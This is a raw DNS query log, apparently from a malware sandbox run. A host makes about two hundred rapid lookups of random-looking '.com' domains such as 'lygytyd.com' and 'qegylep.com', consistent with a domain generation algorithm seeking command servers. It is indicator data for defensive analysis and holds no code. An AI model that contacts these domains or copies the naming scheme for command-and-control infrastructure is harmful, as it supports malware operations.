                                                                                                                                                                                                            Nov 11, 2024 18:25:19.860507965 CET192.168.2.101.1.1.10x8994Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.861546040 CET192.168.2.101.1.1.10x8431Standard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.862392902 CET192.168.2.101.1.1.10x2bd6Standard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.862767935 CET192.168.2.101.1.1.10xe564Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.865613937 CET192.168.2.101.1.1.10x1f6dStandard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.871901989 CET192.168.2.101.1.1.10x736aStandard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.873780966 CET192.168.2.101.1.1.10xb873Standard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.875806093 CET192.168.2.101.1.1.10x831dStandard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876085997 CET192.168.2.101.1.1.10x99b8Standard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876085997 CET192.168.2.101.1.1.10x3ad1Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876283884 CET192.168.2.101.1.1.10x4d20Standard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876317978 CET192.168.2.101.1.1.10x8fadStandard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876497984 CET192.168.2.101.1.1.10x7631Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876660109 CET192.168.2.101.1.1.10x5703Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.876878023 CET192.168.2.101.1.1.10xdb77Standard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.878551006 CET192.168.2.101.1.1.10xaf69Standard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.878958941 CET192.168.2.101.1.1.10xee68Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.881028891 CET192.168.2.101.1.1.10xe246Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.881285906 CET192.168.2.101.1.1.10xe7e4Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.907041073 CET192.168.2.101.1.1.10xc399Standard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.907430887 CET192.168.2.101.1.1.10x3da9Standard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.908323050 CET192.168.2.101.1.1.10x8556Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.908945084 CET192.168.2.101.1.1.10xaed1Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909178972 CET192.168.2.101.1.1.10x3a50Standard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909359932 CET192.168.2.101.1.1.10xfef7Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909555912 CET192.168.2.101.1.1.10x4b81Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.909740925 CET192.168.2.101.1.1.10x4195Standard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.910634041 CET192.168.2.101.1.1.10xdfecStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.910695076 CET192.168.2.101.1.1.10xca98Standard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.910861969 CET192.168.2.101.1.1.10xe9e9Standard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911036968 CET192.168.2.101.1.1.10x4272Standard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911215067 CET192.168.2.101.1.1.10xb627Standard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911236048 CET192.168.2.101.1.1.10x8459Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911422014 CET192.168.2.101.1.1.10x1726Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911602020 CET192.168.2.101.1.1.10x73e7Standard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911675930 CET192.168.2.101.1.1.10xe8bcStandard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911783934 CET192.168.2.101.1.1.10x66c8Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.911947966 CET192.168.2.101.1.1.10xd03aStandard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.912220955 CET192.168.2.101.1.1.10x9bbcStandard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.915432930 CET192.168.2.101.1.1.10x7303Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.915646076 CET192.168.2.101.1.1.10xcd11Standard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.916420937 CET192.168.2.101.1.1.10x3a98Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.916616917 CET192.168.2.101.1.1.10x1c9cStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.917372942 CET192.168.2.101.1.1.10x8e4aStandard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:19.917570114 CET192.168.2.101.1.1.10x9627Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.131535053 CET192.168.2.101.1.1.10x3903Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.131964922 CET192.168.2.101.1.1.10xdd90Standard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.132216930 CET192.168.2.101.1.1.10xb143Standard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.132733107 CET192.168.2.101.1.1.10xd9bStandard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.141839027 CET192.168.2.101.1.1.10x37fdStandard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.143997908 CET192.168.2.101.1.1.10x6848Standard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.150962114 CET192.168.2.101.1.1.10x4ab2Standard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.158103943 CET192.168.2.101.1.1.10x5fa6Standard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.158400059 CET192.168.2.101.1.1.10xca90Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.159774065 CET192.168.2.101.1.1.10xf0ceStandard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.160458088 CET192.168.2.101.1.1.10x9267Standard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.161046028 CET192.168.2.101.1.1.10xa41cStandard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.161264896 CET192.168.2.101.1.1.10x89bbStandard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.161999941 CET192.168.2.101.1.1.10xac84Standard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.162333012 CET192.168.2.101.1.1.10x36fStandard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.162591934 CET192.168.2.101.1.1.10x46baStandard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.170877934 CET192.168.2.101.1.1.10xfe42Standard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.173274040 CET192.168.2.101.1.1.10x408aStandard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.174484015 CET192.168.2.101.1.1.10x3b5aStandard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.191293001 CET192.168.2.101.1.1.10xdf9aStandard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.191771984 CET192.168.2.101.1.1.10xd5dStandard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.192490101 CET192.168.2.101.1.1.10xf6fbStandard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.192672968 CET192.168.2.101.1.1.10x699eStandard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.192751884 CET192.168.2.101.1.1.10xb28dStandard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.192900896 CET192.168.2.101.1.1.10x3551Standard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.193854094 CET192.168.2.101.1.1.10x245dStandard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.198229074 CET192.168.2.101.1.1.10x72d3Standard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.198637009 CET192.168.2.101.1.1.10x144Standard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.199286938 CET192.168.2.101.1.1.10x358dStandard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.199486971 CET192.168.2.101.1.1.10xc628Standard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.199780941 CET192.168.2.101.1.1.10x1653Standard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.200102091 CET192.168.2.101.1.1.10x2909Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.200438023 CET192.168.2.101.1.1.10x46e0Standard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.200506926 CET192.168.2.101.1.1.10xc8caStandard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.200670958 CET192.168.2.101.1.1.10x57f8Standard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.200874090 CET192.168.2.101.1.1.10xbc31Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.200922966 CET192.168.2.101.1.1.10xf246Standard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.201103926 CET192.168.2.101.1.1.10x721aStandard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.201282024 CET192.168.2.101.1.1.10x22d9Standard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.212007999 CET192.168.2.101.1.1.10x62a6Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.212697983 CET192.168.2.101.1.1.10x633bStandard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.215008974 CET192.168.2.101.1.1.10x4e26Standard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.215502024 CET192.168.2.101.1.1.10x2363Standard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.215667963 CET192.168.2.101.1.1.10x8f34Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.215884924 CET192.168.2.101.1.1.10xc17bStandard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.216048002 CET192.168.2.101.1.1.10x687fStandard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.216058969 CET192.168.2.101.1.1.10x41feStandard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.216253042 CET192.168.2.101.1.1.10x64d5Standard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.216519117 CET192.168.2.101.1.1.10x6c06Standard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.216705084 CET192.168.2.101.1.1.10xfc20Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.216994047 CET192.168.2.101.1.1.10xe10cStandard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.217478037 CET192.168.2.101.1.1.10x2c12Standard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.220544100 CET192.168.2.101.1.1.10x27f1Standard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.220839977 CET192.168.2.101.1.1.10x3fceStandard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.222512960 CET192.168.2.101.1.1.10x750eStandard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.224045992 CET192.168.2.101.1.1.10xf739Standard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.224303007 CET192.168.2.101.1.1.10x7477Standard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.224515915 CET192.168.2.101.1.1.10x504Standard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.224632025 CET192.168.2.101.1.1.10x2d2eStandard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.237278938 CET192.168.2.101.1.1.10x716cStandard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.240884066 CET192.168.2.101.1.1.10x189dStandard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.241101027 CET192.168.2.101.1.1.10xda52Standard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.241141081 CET192.168.2.101.1.1.10xbb3bStandard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.241296053 CET192.168.2.101.1.1.10x9054Standard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.688163996 CET192.168.2.101.1.1.10xc331Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.688565969 CET192.168.2.101.1.1.10x49a5Standard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.691346884 CET192.168.2.101.1.1.10x9a16Standard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.692955971 CET192.168.2.101.1.1.10xf2adStandard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.695813894 CET192.168.2.101.1.1.10x5eb2Standard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.701463938 CET192.168.2.101.1.1.10x75edStandard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.706722975 CET192.168.2.101.1.1.10x77daStandard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.706896067 CET192.168.2.101.1.1.10x2796Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.707190990 CET192.168.2.101.1.1.10xaf3eStandard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.721724033 CET192.168.2.101.1.1.10x3399Standard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.722209930 CET192.168.2.101.1.1.10xe0cStandard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.729048014 CET192.168.2.101.1.1.10x4496Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.733612061 CET192.168.2.101.1.1.10x8bd7Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.734302044 CET192.168.2.101.1.1.10xd1f9Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.734894037 CET192.168.2.101.1.1.10x1205Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.735064030 CET192.168.2.101.1.1.10x6c5Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.739006996 CET192.168.2.101.1.1.10xe352Standard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.739089012 CET192.168.2.101.1.1.10x1112Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.739248991 CET192.168.2.101.1.1.10xeb8bStandard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.743019104 CET192.168.2.101.1.1.10xde41Standard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.743275881 CET192.168.2.101.1.1.10x47ecStandard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.785691023 CET192.168.2.101.1.1.10xf221Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.786104918 CET192.168.2.101.1.1.10x9b67Standard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.786269903 CET192.168.2.101.1.1.10x66cStandard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.786418915 CET192.168.2.101.1.1.10xd3dbStandard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.788655996 CET192.168.2.101.1.1.10x5c7dStandard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.789016008 CET192.168.2.101.1.1.10x4185Standard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.789171934 CET192.168.2.101.1.1.10xa6d6Standard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.789419889 CET192.168.2.101.1.1.10x6b50Standard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.789638996 CET192.168.2.101.1.1.10xfc31Standard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.789638996 CET192.168.2.101.1.1.10xa496Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.789824009 CET192.168.2.101.1.1.10xf801Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.789863110 CET192.168.2.101.1.1.10xc80Standard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.790056944 CET192.168.2.101.1.1.10x642fStandard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.790088892 CET192.168.2.101.1.1.10x540aStandard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.790338039 CET192.168.2.101.1.1.10xef99Standard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.790426970 CET192.168.2.101.1.1.10xb1bbStandard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.790581942 CET192.168.2.101.1.1.10xb3a1Standard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.790612936 CET192.168.2.101.1.1.10x5d2dStandard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.790807962 CET192.168.2.101.1.1.10x2cc9Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.790828943 CET192.168.2.101.1.1.10xf1f4Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.790986061 CET192.168.2.101.1.1.10x8018Standard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.791073084 CET192.168.2.101.1.1.10xb2d2Standard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.791157007 CET192.168.2.101.1.1.10xbe40Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.791286945 CET192.168.2.101.1.1.10xfdadStandard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.804667950 CET192.168.2.101.1.1.10x949eStandard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.806447983 CET192.168.2.101.1.1.10x3d2eStandard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.806520939 CET192.168.2.101.1.1.10x4f98Standard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.806730032 CET192.168.2.101.1.1.10x74Standard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.806762934 CET192.168.2.101.1.1.10xa433Standard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.806895018 CET192.168.2.101.1.1.10xc7ebStandard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.806994915 CET192.168.2.101.1.1.10x9fccStandard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.807056904 CET192.168.2.101.1.1.10xe094Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.807225943 CET192.168.2.101.1.1.10x4e41Standard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.807252884 CET192.168.2.101.1.1.10x8379Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.807411909 CET192.168.2.101.1.1.10xa806Standard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.807467937 CET192.168.2.101.1.1.10x31eaStandard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.807562113 CET192.168.2.101.1.1.10xac86Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.809182882 CET192.168.2.101.1.1.10xe387Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.813509941 CET192.168.2.101.1.1.10x1e71Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.813721895 CET192.168.2.101.1.1.10x5435Standard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.813813925 CET192.168.2.101.1.1.10x9ff9Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.830729961 CET192.168.2.101.1.1.10x2f10Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:22.833657026 CET192.168.2.101.1.1.10x92d2Standard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.402652025 CET192.168.2.101.1.1.10x3279Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.402946949 CET192.168.2.101.1.1.10xb389Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.403208971 CET192.168.2.101.1.1.10x20ecStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.410885096 CET192.168.2.101.1.1.10x6028Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.423540115 CET192.168.2.101.1.1.10x9aebStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.423978090 CET192.168.2.101.1.1.10x2b78Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.424513102 CET192.168.2.101.1.1.10xf63fStandard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.434726954 CET192.168.2.101.1.1.10x5bd1Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.447078943 CET192.168.2.101.1.1.10x322cStandard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.448450089 CET192.168.2.101.1.1.10x66afStandard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:25:23.477170944 CET192.168.2.101.1.1.10x8d61Standard query (0)qexykug.comA (IP address)IN (0x0001)false
